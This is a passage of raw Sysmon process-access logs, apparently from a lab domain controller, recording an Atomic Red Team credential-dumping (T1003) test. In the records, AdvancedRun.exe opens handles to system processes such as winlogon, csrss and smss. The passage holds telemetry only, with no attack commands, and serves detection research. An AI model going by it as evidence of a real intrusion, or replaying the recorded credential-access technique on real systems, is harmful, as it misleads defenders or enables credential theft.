n\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942621Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942620Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942619Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942618Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003942617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003942613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}1968C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Win